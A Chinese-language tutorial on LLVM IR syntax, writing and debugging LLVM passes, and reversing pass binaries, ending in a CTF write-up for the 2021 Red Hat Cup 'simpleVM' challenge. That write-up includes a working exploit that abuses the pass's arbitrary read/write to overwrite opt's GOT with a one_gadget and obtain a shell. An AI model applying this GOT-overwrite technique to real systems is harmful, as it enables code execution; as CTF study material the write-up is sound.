LLVM
LLVM是一个编译器框架。LLVM作为编译器框架,是需要各种功能模块支撑起来的,可以将clang和lld都看做是LLVM的组成部分。下图是Clang/LLVM的简单架构。

LLVM IR
LLVM IR是LLVM的中间表示,文档https://llvm.org/docs/LangRef.html
LLVM中,IR有三种表示
.ll:给人类看的,介于高等语言和汇编之间.bc:不可读的二进制IR,称作位码(bitcode)- 内存格式
基础语法
全局变量:
@global_variable = global i32 0
栈上变量
%local_variable = alloca i32
这两个变量实际上都是ptr指针,指向它们所处的一个i32大小的内存区域 要操作这些值,必须使用load和store这两个命令
load获取值,下面把一个ptr指针@global_variable的i32类型的值赋给虚拟寄存器%1:
%1 = load i32, ptr @global_variable
store存储值,下面将i32类型的值1赋给ptr类型的全局变量@global_variable所指的内存区域中:
store i32 1, ptr @global_variable
指针类型:ptr
int x, y; size_t address_of_x = (size_t)&x; size_t address_of_y = address_of_x - sizeof(int); int also_y = *(int *)address_of_y;
%x = alloca i32 ; %x is of type ptr, which is the address of variable x %y = alloca i32 ; %y is of type ptr, which is the address of variable y %address_of_x = ptrtoint ptr %x to i64 %address_of_y = sub i64 %address_of_x, 4 %also_y = inttoptr i64 %address_of_y to ptr ; %also_y is of type ptr, which is the address of variable y
聚合类型:数组和结构体
C语言中的int[4]如下
%a = alloca [4 x i32]
也可以使用类似语法进行初始化:
@global_array = global [4 x i32] [i32 0, i32 1, i32 2, i32 3]
特别地,因为字符串在底层可以看作字符组成的数组,所以LLVM IR为我们提供了语法糖:
@global_string = global [12 x i8] c"Hello world\00"
C中结构体:
struct MyStruct { int x; char y; };
对应IR:
%MyStruct = type { i32, i8 }
初始化一个结构体:
@global_structure = global %MyStruct { i32 1, i8 0 } ; or @global_structure = global { i32, i8 } { i32 1, i8 0 }
getelementptr:访问以指针形式存储的聚合类型
C:
struct MyStruct { int x; int y; }; void foo(struct MyStruct *my_structs_ptr) { int my_y = my_structs_ptr[2].y; }
IR:
%MyStruct = type { i32, i32 } define void @foo(ptr %my_structs_ptr) { %my_y_in_stack = alloca i32 %my_y_ptr = getelementptr %MyStruct, ptr %my_structs_ptr, i64 2, i32 1 %my_y_val = load i32, ptr %my_y_ptr store i32 %my_y_val, ptr %my_y_in_stack ret void }
核心:getelementptr 4个参数
%MyStruct:要取地址的指针,指向区域的类型为%MyStructptr %my_structs_ptr:要操作的指针,是ptr %my_structs_ptri64 2:取偏移量为2的那个元素,也就是my_structs_ptr[2]i32 1:对于获得到的那个元素,取索引为1的字段,也就是my_structs_ptr[2].y
更多getelementptr机理:https://llvm.org/docs/GetElementPtr.html
LLVM相关工具
opt是一个在IR级别做程序优化的工具,输入和输出都是同一类型的LLVM IR
llvm-link,是IR级别的链接器,链接IR文件
llvm-as是针对LLVM IR的汇编器,功能是将.ll文件翻译为.bc文件。在LLVM项目里,.ll称为LLVM汇编码。
llvm-dis和llvm-as相反,即IR的反汇编器,将.bc文件翻译为.ll文件
clang。通过指定-emit-llvm参数,可以配合-S或-c生成.ll或.bc文件,就能把Clang的部分和LLVM的后端分离开独立运行
.c -> .ll:clang -emit-llvm -S a.c -o a.ll .c -> .bc: clang -emit-llvm -c a.c -o a.bc .ll -> .bc: llvm-as a.ll -o a.bc .bc -> .ll: llvm-dis a.bc -o a.ll .bc -> .s: llc a.bc -o a.s
LLVM PASS
然后学习一下LLVM PASS是什么 学习链接: http://www.aosabook.org/en/llvm.html https://zhuanlan.zhihu.com/p/122522485 https://llvm.org/docs/WritingAnLLVMPass.html (官方) https://llvm.org/devmtg/2019-04/slides/Tutorial-Bridgers-LLVM_IR_tutorial.pdf
LLVM Pass框架是LLVM系统的重要组成部分,因为LLVM Passes是编译器中最有意思的部分。Passes执行构成编译器的转换和优化,它们构建这些转换所使用的分析结果,并且它们首先是编译器代码的结构化技术。
所有LLVM passes都是Pass的子类,它们能通过重写继承自Pass的虚拟方法来实现功能。根据你的pass如何工作,你应该继承ModulePass , CallGraphSCCPass, FunctionPass , or LoopPass, 或者RegionPass类,这些类为系统提供了更多关于你的pass做什么的信息,以及它如何与其他pass类相结合。LLVM Pass框架的一个重要特征是它根据你的pass满足的约束(由他们的派生类指示)来调度passes以一个有效的方式运行
Hello world of passes
环境安装,直接使用预编译包
$ sudo apt install llvm $ sudo apt install clang
可以通过sudo apt install llvm-x.y来指定版本
代码如下
命名空间llvm
namespace{开始于一个匿名空间。匿名空间之于c++就像static关键字之于C(在全局作用域)。它让匿名空间内声明的内容仅对当前文件可见。
接下来struct Hello : public FunctionPass {声明了一个Hello类,它是FunctionPass的子类。FunctionPass每次操作一个函数
接着声明LLVM用来标识pass的pass标识符,这允许LLVM避免使用expensive C++ runtime information
static char ID; Hello() : FunctionPass(ID) {}
声明一个runOnFunction方法,它重写了继承自FunctionPass的抽象虚拟方法。
bool runOnFunction(Function &F) override { errs() << "Hello: "; errs().write_escaped(F.getName()) << '\n'; return false; } }; // end of struct Hello } // end of anonymous namespace
char Hello::ID = 0;初始化pass ID。LLVM使用ID地址来标识一个通道,所以初始化值并不重要
最后注册Hello类,给他一个命令行参数"hello",并命名为"Hello World Pass"。最后两个参数描述了它的行为,如果一个pass不修改CFG ,那么第三个参数就被设置为true;如果一个pass是一个分析pass,例如dominator tree pass,那么true就会作为第四个参数。
static RegisterPass<Hello> X("hello", "Hello World Pass", false /* Only looks at CFG */, false /* Analysis Pass */);
完整代码,作用就是在runOnFunction中,遍历了IR中的函数,并打印出函数名称
#include "llvm/Pass.h" #include "llvm/IR/Function.h" #include "llvm/Support/raw_ostream.h" #include "llvm/IR/LegacyPassManager.h" #include "llvm/Transforms/IPO/PassManagerBuilder.h" using namespace llvm; namespace { struct Hello : public FunctionPass { static char ID; Hello() : FunctionPass(ID) {} bool runOnFunction(Function &F) override { errs() << "Hello: "; errs().write_escaped(F.getName()) << '\n'; return false; } }; // end of struct Hello } // end of anonymous namespace char Hello::ID = 0; static RegisterPass<Hello> X("hello", "Hello World Pass", false /* Only looks at CFG */, false /* Analysis Pass */); static RegisterStandardPasses Y( PassManagerBuilder::EP_EarlyAsPossible, [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) { PM.add(new Hello()); });
编译
clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared Hello.cpp -o LLVMHello.so `llvm-config --ldflags`
即可得到一个LLVMHello.so文件
接下来可以使用opt命令通过pass来运行一个LLVM程序,因为使用RegisterPass注册了pass,所以一旦被加载就能使用opt访问它
现在随便写一个程序
#include<stdio.h> #include<stdlib.h> int a(){return 0;} int b(){return 0;} int c(){return 0;} int main(){ printf("1!\n"); return 0; }
使用clang编译成.ll文件
clang -emit-llvm -S main.c -o main.ll
; ModuleID = 'main.c' source_filename = "main.c" target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128" target triple = "x86_64-pc-linux-gnu" @.str = private unnamed_addr constant [4 x i8] c"1!\0A\00", align 1 ; Function Attrs: noinline nounwind optnone uwtable define i32 @a() #0 { ret i32 0 } ; Function Attrs: noinline nounwind optnone uwtable define i32 @b() #0 { ret i32 0 } ; Function Attrs: noinline nounwind optnone uwtable define i32 @c() #0 { ret i32 0 } ; Function Attrs: noinline nounwind optnone uwtable define i32 @main() #0 { %1 = alloca i32, align 4 store i32 0, i32* %1, align 4 %2 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i32 0, i32 0)) ret i32 0 } declare i32 @printf(i8*, ...) #1 attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" } attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" } !llvm.module.flags = !{!0} !llvm.ident = !{!1} !0 = !{i32 1, !"wchar_size", i32 4} !1 = !{!"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"}
运行一下,LLVM PASS就会遍历IR并输出每个函数的函数名称
ayoung@ubuntu:~/pwn/llvm/eg$ opt -load ./LLVMHello.so -hello ./main.ll WARNING: You're attempting to print out a bitcode file. This is inadvisable as it may cause display problems. If you REALLY want to taste LLVM bitcode first-hand, you can force output with the `-f' option. Hello: a Hello: b Hello: c Hello: main
魔改Hello world
操作环境ubuntu22.04
// Hello.cpp #include "llvm/Pass.h" #include "llvm/IR/Function.h" #include "llvm/IR/Constants.h" #include "llvm/IR/BasicBlock.h" #include "llvm/IR/Instructions.h" #include "llvm/Support/raw_ostream.h" #include "llvm/IR/LegacyPassManager.h" #include "llvm/Transforms/IPO/PassManagerBuilder.h" using namespace llvm; namespace { struct Hello : public FunctionPass { static char ID; Hello() : FunctionPass(ID) {} bool runOnFunction(Function &F) override { errs() << "Hello: "; errs().write_escaped(F.getName()) << '\n'; SymbolTableList<BasicBlock>::const_iterator bbEnd = F.end(); for(SymbolTableList<BasicBlock>::const_iterator bbIter = F.begin(); bbIter != bbEnd; ++bbIter){ SymbolTableList<Instruction>::const_iterator instIter = bbIter->begin(); SymbolTableList<Instruction>::const_iterator instEnd = bbIter->end(); for(; instIter != instEnd; ++instIter){ errs() << "OpcodeName = " << instIter->getOpcodeName() << " NumOperands = " << instIter->getNumOperands() << "\n"; if (instIter->getOpcode() == 56) { if(const CallInst* call_inst = dyn_cast<CallInst>(instIter)) { errs() << call_inst->getCalledFunction()->getName() << "\n"; for (int i = 0; i < instIter->getNumOperands()-1; i++) { if (isa<ConstantInt>(call_inst->getOperand(i))) { errs() << "ConstantInt " << i << " = " << dyn_cast<ConstantInt>(call_inst->getArgOperand(i))->getZExtValue() << "\n"; } if (isa<StoreInst>(call_inst->getOperand((i)))) { errs() << "StoreInst " << i << " = " << dyn_cast<StoreInst>(call_inst->getArgOperand(i))->getValueOperand() << "\n"; } } } } } } return false; } }; } char Hello::ID = 0; // Register for opt static RegisterPass<Hello> X("Hello", "Hello World Pass"); // Register for clang static RegisterStandardPasses Y(PassManagerBuilder::EP_EarlyAsPossible, [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) { PM.add(new Hello()); });
编译(缺头文件 locate或find找文件 补路径)
clang -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -share d mm.cpp -o LLVMHello.so `llvm-config --ldflags`
运行(使用 llvm pass wmctf2024 里的exp)
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./opt -load ./LLVMHello.so -Hello -enable-new-pm=0 main.ll WARNING: You're attempting to print out a bitcode file. This is inadvisable as it may cause display problems. If you REALLY want to taste LLVM bitcode first-hand, you can force output with the `-f' option. Hello: a OpcodeName = alloca NumOperands = 1 OpcodeName = alloca NumOperands = 1 OpcodeName = store NumOperands = 2 OpcodeName = load NumOperands = 1 OpcodeName = call NumOperands = 2 WMCTF_OPEN OpcodeName = store NumOperands = 2 OpcodeName = call NumOperands = 2 WMCTF_MMAP ConstantInt 0 = 30864 OpcodeName = call NumOperands = 2 WMCTF_READ ConstantInt 0 = 26214 OpcodeName = load NumOperands = 1 OpcodeName = call NumOperands = 2 WMCTF_WRITE OpcodeName = ret NumOperands = 0 Hello: b OpcodeName = alloca NumOperands = 1 OpcodeName = store NumOperands = 2 OpcodeName = load NumOperands = 1 OpcodeName = call NumOperands = 2 a OpcodeName = ret NumOperands = 0 Hello: c OpcodeName = alloca NumOperands = 1 OpcodeName = store NumOperands = 2 OpcodeName = load NumOperands = 1 OpcodeName = call NumOperands = 2 b OpcodeName = ret NumOperands = 0 Hello: d OpcodeName = alloca NumOperands = 1 OpcodeName = store NumOperands = 2 OpcodeName = load NumOperands = 1 OpcodeName = call NumOperands = 2 c OpcodeName = ret NumOperands = 0 Hello: e OpcodeName = alloca NumOperands = 1 OpcodeName = store NumOperands = 2 OpcodeName = load NumOperands = 1 OpcodeName = call NumOperands = 2 d OpcodeName = ret NumOperands = 0
静态分析
__int64 __fastcall GLOBAL__sub_I_Hello_cpp(llvm::PassRegistry *a1) { __int64 PassRegistry; // rax __int64 result; // rax _BYTE v3[16]; // [rsp+0h] [rbp-28h] BYREF __m128i v4; // [rsp+10h] [rbp-18h] X = "Hello World Pass"; qword_3088 = 16LL; qword_3090 = "hello"; qword_3098 = 5LL; qword_30A0 = &`anonymous namespace'::Hello::ID; word_30A8 = 0; byte_30AA = 0; xmmword_30B0 = 0LL; qword_30C0 = 0LL; qword_30C8 = llvm::callDefaultCtor<`anonymous namespace'::Hello>; PassRegistry = llvm::PassRegistry::getPassRegistry(a1); llvm::PassRegistry::registerPass(PassRegistry, &X, 0LL); __cxa_atexit(llvm::PassInfo::~PassInfo, &X, &_dso_handle); v4 = _mm_unpacklo_epi64( std::_Function_base::_Base_manager<$_0>::_M_manager, std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke); result = llvm::PassManagerBuilder::addGlobalExtension(0LL, v3); if ( v4.m128i_i64[0] ) return (v4.m128i_i64[0])(v3, v3, 3LL); return result; }
双击
llvm::callDefaultCtor<`anonymous namespace'::Hello>
__int64 llvm::callDefaultCtor<`anonymous namespace'::Hello>() { __int64 result; // rax result = operator new(0x20uLL); *(result + 8) = 0LL; *(result + 16) = &`anonymous namespace'::Hello::ID; *(result + 24) = 3; *result = off_2D38; return result; }
再双击最下方的指针off_2D38即可看到虚表位置。其中最下方的指针runOnFunction就是LLVM PASS中重写的runOnFunction方法。
.data.rel.ro:0000000000002D38 off_2D38 dq offset _ZN4llvm4PassD2Ev .data.rel.ro:0000000000002D38 ; DATA XREF: llvm::callDefaultCtor<`anonymous namespace'::Hello>(void)+25↑o .data.rel.ro:0000000000002D38 ; std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke(std::_Any_data const&,llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &)+32↑o .data.rel.ro:0000000000002D38 ; llvm::Pass::~Pass() .data.rel.ro:0000000000002D40 dq offset _ZN12_GLOBAL__N_15HelloD0Ev ; `anonymous namespace'::Hello::~Hello() .data.rel.ro:0000000000002D48 dq offset _ZNK4llvm4Pass11getPassNameEv ; llvm::Pass::getPassName(void) .data.rel.ro:0000000000002D50 dq offset _ZN4llvm4Pass16doInitializationERNS_6ModuleE ; llvm::Pass::doInitialization(llvm::Module &) .data.rel.ro:0000000000002D58 dq offset _ZN4llvm4Pass14doFinalizationERNS_6ModuleE ; llvm::Pass::doFinalization(llvm::Module &) .data.rel.ro:0000000000002D60 dq offset _ZNK4llvm4Pass5printERNS_11raw_ostreamEPKNS_6ModuleE ; llvm::Pass::print(llvm::raw_ostream &,llvm::Module const*) .data.rel.ro:0000000000002D68 dq offset _ZNK4llvm12FunctionPass17createPrinterPassERNS_11raw_ostreamERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE ; llvm::FunctionPass::createPrinterPass(llvm::raw_ostream &,std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>> const&) .data.rel.ro:0000000000002D70 dq offset _ZN4llvm12FunctionPass17assignPassManagerERNS_7PMStackENS_15PassManagerTypeE ; llvm::FunctionPass::assignPassManager(llvm::PMStack &,llvm::PassManagerType) .data.rel.ro:0000000000002D78 dq offset _ZN4llvm4Pass18preparePassManagerERNS_7PMStackE ; llvm::Pass::preparePassManager(llvm::PMStack &) .data.rel.ro:0000000000002D80 dq offset _ZNK4llvm12FunctionPass27getPotentialPassManagerTypeEv ; llvm::FunctionPass::getPotentialPassManagerType(void) .data.rel.ro:0000000000002D88 dq offset _ZNK4llvm4Pass16getAnalysisUsageERNS_13AnalysisUsageE ; llvm::Pass::getAnalysisUsage(llvm::AnalysisUsage &) .data.rel.ro:0000000000002D90 dq offset _ZN4llvm4Pass13releaseMemoryEv ; llvm::Pass::releaseMemory(void) .data.rel.ro:0000000000002D98 dq offset _ZN4llvm4Pass26getAdjustedAnalysisPointerEPKv ; llvm::Pass::getAdjustedAnalysisPointer(void const*) .data.rel.ro:0000000000002DA0 dq offset _ZN4llvm4Pass18getAsImmutablePassEv ; llvm::Pass::getAsImmutablePass(void) .data.rel.ro:0000000000002DA8 dq offset _ZN4llvm4Pass18getAsPMDataManagerEv ; llvm::Pass::getAsPMDataManager(void) .data.rel.ro:0000000000002DB0 dq offset _ZNK4llvm4Pass14verifyAnalysisEv ; llvm::Pass::verifyAnalysis(void) .data.rel.ro:0000000000002DB8 dq offset _ZN4llvm4Pass17dumpPassStructureEj ; llvm::Pass::dumpPassStructure(uint) .data.rel.ro:0000000000002DC0 dq offset _ZN12_GLOBAL__N_15Hello13runOnFunctionERN4llvm8FunctionE ; `anonymous namespace'::Hello::runOnFunction(llvm::Function &) .data.rel.ro:0000000000002DC0 _data_rel_ro ends
点进来即可看到重写方法的内容
__int64 __fastcall `anonymous namespace'::Hello::runOnFunction(llvm *a1, llvm::Value *a2) { llvm *v2; // rax __int64 v3; // rcx __int64 v4; // rbx __int64 Name; // rax __int64 v6; // rdx llvm::raw_ostream *v7; // rax _BYTE *v8; // rcx v2 = llvm::errs(a1); v3 = *(v2 + 3); if ( (*(v2 + 2) - v3) > 6 ) { *(v3 + 6) = 32; *(v3 + 4) = 14959; *v3 = 1819043144; *(v2 + 3) += 7LL; } else { a1 = v2; llvm::raw_ostream::write(v2, "Hello: ", 7uLL); } v4 = llvm::errs(a1); Name = llvm::Value::getName(a2); v7 = llvm::raw_ostream::write_escaped(v4, Name, v6, 0LL); v8 = *(v7 + 3); if ( v8 >= *(v7 + 2) ) { llvm::raw_ostream::write(v7, 0xAu); } else { *(v7 + 3) = v8 + 1; *v8 = 10; } return 0LL; }
动态调试
官方文档中也介绍了如何使用gdb进行动态调试
首先在opt进程上启动gdb
gdb opt
opt有很多调试信息,加载需要时间。因为我们还不能在我们的pass中设置断点(共享object直到运行时才加载),所以我们必须执行程序,并让他在调用pass之前、加载共享object之后停下来。最简单的方法是在PassManager::run设置一个断点并配合想要的参数运行程序。下面参数中-hello对应加载的pass文件里注册类时的第一个参数
Reading symbols from opt...(no debugging symbols found)...done. pwndbg> b PassManager::run Breakpoint 1 at 0x9be40 pwndbg> set args -load ./LLVMHello.so -hello ./main.ll pwndbg> show args Argument list to give program being debugged when it is started is "-load ./LLVMHello.so -hello ./main.ll". pwndbg> r
一旦opt在PassManager::run方法中停止,就能够自由地在pass中设置断点从而完成调试了
调试脚本debug.sh
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat debug.sh gdb opt -x "a.gdb" ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat a.gdb set args -load ./WMCTF.so -WMCTF -enable-new-pm=0 main.ll b PassManager::run r vmmap WMCTF #b *(0x7ffff14c6000+0xd3cd) b *(0x7ffff14c6000+0xD547) b *0x7ffff14d360e c
番外 编写输出IR中间语言
u22.04
// HelloGlobalVariable.cpp #include "llvm/IR/BasicBlock.h" #include "llvm/IR/Function.h" #include "llvm/IR/GlobalVariable.h" #include "llvm/IR/IRBuilder.h" #include "llvm/IR/LLVMContext.h" #include "llvm/IR/Module.h" #include "llvm/IR/Verifier.h" using namespace llvm; int main(int argc, char* argv[]) { LLVMContext context; IRBuilder<> builder(context); // Create a module Module* module = new Module("HelloModule", context); // Add a global variable module->getOrInsertGlobal("helloGlobalVariable", Type::getInt32Ty(context)); GlobalVariable* globalVariable = module->getNamedGlobal("helloGlobalVariable"); globalVariable->setLinkage(GlobalValue::CommonLinkage); globalVariable->setAlignment(MaybeAlign(4)); // Add a function Type* voidType = Type::getVoidTy(context); FunctionType* functionType = FunctionType::get(voidType, false); Function* function = Function::Create(functionType, GlobalValue::ExternalLinkage, "HelloFunction", module); // Create a block BasicBlock* block = BasicBlock::Create(context, "entry", function); builder.SetInsertPoint(block); // Print the IR verifyFunction(*function); module->print(outs(), nullptr); return 0; }
编译
clang++ -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ -w -o HelloGlobalVariable `llvm-config --cxxflags --ldflags --system-libs --libs core` HelloGlobalVariable.cpp
输出
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./HelloGlobalVariable ; ModuleID = 'TriggerModule' source_filename = "TriggerModule" @triggerString.addr = private constant [15 x i8] c"Trigger String\00" @globalTriggerVariable = private global i8* getelementptr inbounds ([15 x i8], [15 x i8]* @triggerString.addr, i32 0, i32 0), align 4 declare void @targetFunction() define void @HelloFunction() { entry: %loadTrigger = load i8*, i8** @globalTriggerVariable, align 8 store i8* %loadTrigger, [15 x i8]* @triggerString.addr, align 8 call void @targetFunction() ret void }
例题
2021红帽杯 simpleVM
先找runOnFunction,一般都是通过重写这个函数来进行一些自定义的操作,由于LLVM PASS编译出的结构都比较相似,可以通过查找最后找到虚表,最下方的就是runOnFunction。
可以看到是在遍历函数名称(llvm::Value::getName),如果函数名是o0o0o0o0则进入sub_6AC0进一步操作
__int64 __fastcall sub_6830(__int64 a1, llvm::Value *a2) { __int64 v2; // rdx bool v4; // [rsp+7h] [rbp-119h] size_t v5; // [rsp+10h] [rbp-110h] const void *Name; // [rsp+28h] [rbp-F8h] __int64 v7; // [rsp+30h] [rbp-F0h] int v8; // [rsp+94h] [rbp-8Ch] Name = llvm::Value::getName(a2); v7 = v2; if ( "o0o0o0o0" ) v5 = strlen("o0o0o0o0"); else v5 = 0LL; v4 = 0; if ( v7 == v5 ) { if ( v5 ) v8 = memcmp(Name, "o0o0o0o0", v5); else v8 = 0; v4 = v8 == 0; } if ( v4 ) sub_6AC0(a1, a2); return 0LL; }
这里的llvm::Function::begin,llvm::Function::end顾名思义,就是获取一个BasicBlock的开头和结尾,进行遍历操作,遍历IR中的o0o0o0o0函数的BasicBlock基本代码块,然后送进sub_6B80处理进一步处理。
unsigned __int64 __fastcall sub_6AC0(__int64 a1, llvm::Function *a2) { llvm::BasicBlock *v3; // [rsp+20h] [rbp-30h] __int64 v4; // [rsp+38h] [rbp-18h] BYREF __int64 v5[2]; // [rsp+40h] [rbp-10h] BYREF v5[1] = __readfsqword(0x28u); v5[0] = llvm::Function::begin(a2); while ( 1 ) { v4 = llvm::Function::end(a2); if ( (llvm::operator!=(v5, &v4) & 1) == 0 ) break; v3 = llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5); sub_6B80(a1, v3); llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator++( v5, 0LL); } return __readfsqword(0x28u); }
sub_6B80这个函数会遍历基本代码块中的指令,并匹配相应的操作,也就是类似vm能够实现各种指令。
开头是个循环,截取一部分。其中llvm::Instruction::getOpcode返回指令类型,需要是55才会进入后续逻辑。这里指令对应的值定义在/include/llvm/IR/Instruction.def,55对应call
所以这里定义了pop,push,store,load,add,min这几个函数名对应的操作
v39[1] = __readfsqword(0x28u); v39[0] = llvm::BasicBlock::begin(a2); while ( 1 ) { v38 = llvm::BasicBlock::end(a2); if ( (llvm::operator!=(v39, &v38) & 1) == 0 ) break; v36 = llvm::dyn_cast<llvm::Instruction,llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,false>>(v39); if ( llvm::Instruction::getOpcode(v36) == 55 ) { v35 = llvm::dyn_cast<llvm::CallInst,llvm::Instruction>(v36); if ( v35 ) { s1 = malloc(0x20uLL); CalledFunction = llvm::CallBase::getCalledFunction(v35); Name = llvm::Value::getName(CalledFunction); *s1 = *Name; *(s1 + 1) = Name[1]; *(s1 + 2) = Name[2]; *(s1 + 3) = Name[3]; if ( !strcmp(s1, "pop") ) ... else if ( !strcmp(s1, "push") ) ... else if ( !strcmp(s1, "store") ) ... else if ( !strcmp(s1, "load") ) ... else if ( !strcmp(s1, "add") ) ... else if ( !strcmp(s1, "min") && llvm::CallBase::getNumOperands(v35) == 3 ) ... } ...
HANDLE_OTHER_INST(55, Call , CallInst ) // Call a function
其中比较重要的有add
llvm::CallBase::getNumOperands,返回funcletpad参数的数量,是返回一条指令中变量的个数,实际上返回的值是函数参数的个数+1
llvm::CallBase::getArgOperand,第二个参数指明取出第几个操作数
llvm::ConstantInt::getZExtValue,get Zero extend value,返回0扩展值
这里reg1_0和reg2_0是两个全局变量,可以理解为两个寄存器,当第一个操作数是1时将reg1_0的地址赋给reg,如果第一个操作数是2就把reg2_0的地址赋给reg;然后以reg为地址取值,加等于第二个操作数的值
else if ( !strcmp(s1, "add") ) { if ( llvm::CallBase::getNumOperands(v35) == 3 ) { v17 = llvm::CallBase::getArgOperand(v35, 0); reg = 0LL; v15 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v17); if ( v15 ) { v14 = llvm::ConstantInt::getZExtValue(v15); if ( v14 == 1 ) reg = reg1_0; if ( v14 == 2 ) reg = reg2_0; } if ( reg ) { v13 = llvm::CallBase::getArgOperand(v35, 1u); v12 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v13); if ( v12 ) *reg += llvm::ConstantInt::getZExtValue(v12); } } }
load,一个参数,若为1则以reg1_0为地址取值,赋给reg2_0里;如果为2则以reg2_0为地址取值存到reg1_0里。显然这里没有对其值做任何边界检查,存在任意地址读。
else if ( !strcmp(s1, "load") ) { if ( llvm::CallBase::getNumOperands(v35) == 2 ) { v21 = llvm::CallBase::getArgOperand(v35, 0); v20 = 0LL; v19 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v21); if ( v19 ) { v18 = llvm::ConstantInt::getZExtValue(v19); if ( v18 == 1 ) v20 = reg1_0; if ( v18 == 2 ) v20 = reg2_0; } if ( v20 == reg1_0 ) *reg2_0 = **reg1_0; if ( v20 == reg2_0 ) *reg1_0 = **reg2_0; } }
store,一个参数,若为1则把reg2_0里的值存到reg1_0存的地址指向的空间,若为2则把reg1_0里的值存到reg2_0存的地址指向的空间。显然存在任意地址写
else if ( !strcmp(s1, "store") ) { if ( llvm::CallBase::getNumOperands(v35) == 2 ) { v25 = llvm::CallBase::getArgOperand(v35, 0); v24 = 0LL; v23 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v25); if ( v23 ) { v22 = llvm::ConstantInt::getZExtValue(v23); if ( v22 == 1 ) v24 = reg1_0; if ( v22 == 2 ) v24 = reg2_0; } if ( v24 == reg1_0 ) { **reg1_0 = *reg2_0; } else if ( v24 == reg2_0 ) { **reg2_0 = *reg1_0; } } }
同时给定的opt-8的got表是可写的,且未开启PIE,所以直接改写opt中got表地址为one gadget即可getshell
pwndbg> checksec [*] '/home/ayoung/pwn/llvm/opt-8' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) pwndbg>
exp
具体一点就是先用add将reg1写入got表地址,然后load(1)把函数真实地址加载到reg2上(mov reg2, [reg1]),接着再add一次把函数真实地址加成onegadget,最后用store(1)把reg2存进reg1指向的got表地址(mov [reg1], reg2)。 这里网上的wp都是改写free,我本来想改malloc的发现似乎后来都没调用,索性覆盖一片地址,最后能getshell就行
//clang -emit-llvm -S exp.c -o exp.ll void store(int a); void load(int a); void add(int a, int b); void o0o0o0o0(){ add(1, 0x77e120); load(1); add(2, 0x732dc); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); store(1); add(1, 0x8); }
ayoung@ubuntu:~/pwn/llvm$ ./opt-8 -load ./VMPass.so -VMPass ./exp.ll WARNING: You're attempting to print out a bitcode file. This is inadvisable as it may cause display problems. If you REALLY want to taste LLVM bitcode first-hand, you can force output with the `-f' option. $ whoami ayoung $